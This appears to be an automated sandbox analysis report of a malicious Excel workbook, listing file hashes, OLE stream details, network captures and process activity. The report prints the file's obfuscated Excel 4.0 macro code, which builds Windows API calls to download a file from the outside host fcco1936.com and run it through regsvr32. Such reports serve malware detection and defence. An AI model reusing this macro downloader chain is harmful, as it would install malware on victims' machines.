    Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:41:54 2020, Security: 0
    Entropy (8bit):7.522333980048165
    TrID:
    • Microsoft Excel sheet (30009/1) 78.94%
    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
    File name:document-148570644.xls
    File size:338944
    MD5:11aaacbcd509c8956e703db1b045e831
    SHA1:bf1eab2dfeb84b2153857c51deb2549ba747a8e9
    SHA256:f7e36187c4d6447fb6c53506d996fd943027c1cf99c54e7300c6ac086a30a4f3
    SHA512:bd09dd9fe744ab3b510f52a841a819ea4dbe483568cb48a11b725971c56fdb3a8e52d660b57b289fe28b35f1a53b2f22ec53b077a7c2a97c1eb10c356ccb52f7
    SSDEEP:6144:AcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTW:5izo8RnsIROnr6n75YW
    File Content Preview:........................>......................................................................................................................................................................................................................................

    File Icon

    Icon Hash:e4eea286a4b4bcb4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "document-148570644.xls"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Excel
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1251
    Author:
    Last Saved By:
    Create Time:2006-09-16 00:00:00
    Last Saved Time:2020-11-26 09:41:54
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:917504

    Streams

    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.367004077607
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.254255489206
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326145
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:326145
    Entropy:7.65699487976
    Base64 Encoded:True
    Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
    Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

    Macro 4.0 Code

    CALL("Ke"&????2!FS355&"32", "Cr"&????2!FU383&"yA", "JCJ", ????2!FJ353&????2!FJ368, 0)
    
    CALL("U"&????2!FU373, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!FJ353&????2!FJ368&????2!FJ382, 0, 0)
    
    =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!FS355&""32"",""Cr""&????2!FU383&""yA"",""JCJ"",????2!FJ353&????2!FJ368,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
    "=CALL(""Ke""&????2!FS355&""32"",""Cr""&????2!FU383&""yA"",""JCJ"",????2!FJ353,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
    "=CALL(""U""&????2!FU373,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!FJ353&????2!FJ368&????2!FJ382,0,0)"=EXEC(????3!W36&????2!FJ353&????2!FJ368&????2!FJ382)=HALT()

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 29, 2020 04:49:13.939721107 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:49:16.957026005 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:49:22.963625908 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:49:23.029652119 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:49:23.029782057 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:49:23.030992985 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:49:23.095735073 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:49:23.097006083 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:49:23.097212076 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:49:23.363931894 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:49:23.364067078 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:49:23.630619049 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:49:23.630847931 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:49:28.102360964 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:49:28.102703094 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:51:13.827501059 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:51:14.138849020 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:51:14.747001886 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:51:15.948275089 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:51:18.351026058 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:51:23.156301022 CET4916580192.168.2.22185.253.218.120

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 29, 2020 04:49:13.871802092 CET5219753192.168.2.228.8.8.8
    Nov 29, 2020 04:49:13.917887926 CET53521978.8.8.8192.168.2.22

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Nov 29, 2020 04:49:13.871802092 CET192.168.2.228.8.8.80x1168Standard query (0)fcco1936.comA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Nov 29, 2020 04:49:13.917887926 CET8.8.8.8192.168.2.220x1168No error (0)fcco1936.com185.253.218.120A (IP address)IN (0x0001)

    HTTP Request Dependency Graph

    • fcco1936.com

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249165185.253.218.12080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Nov 29, 2020 04:49:23.030992985 CET0OUTGET /ds/231120.gif HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: fcco1936.com
    Connection: Keep-Alive
    Nov 29, 2020 04:49:23.097006083 CET1INHTTP/1.1 401 Unauthorized
    Date: Sun, 29 Nov 2020 03:49:23 GMT
    Server: Apache
    WWW-Authenticate: Basic realm="Protected"
    Content-Length: 503
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p><p>Additionally, a 401 Unauthorizederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Nov 29, 2020 04:49:23.363931894 CET2INHTTP/1.1 401 Unauthorized
    Date: Sun, 29 Nov 2020 03:49:23 GMT
    Server: Apache
    WWW-Authenticate: Basic realm="Protected"
    Content-Length: 503
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p><p>Additionally, a 401 Unauthorizederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Nov 29, 2020 04:49:23.630619049 CET3INHTTP/1.1 401 Unauthorized
    Date: Sun, 29 Nov 2020 03:49:23 GMT
    Server: Apache
    WWW-Authenticate: Basic realm="Protected"
    Content-Length: 503
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p><p>Additionally, a 401 Unauthorizederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


    Code Manipulations

    Statistics

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:04:48:37
    Start date:29/11/2020
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13ff60000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:04:48:50
    Start date:29/11/2020
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Imagebase:0xfffe0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis

    Reset < >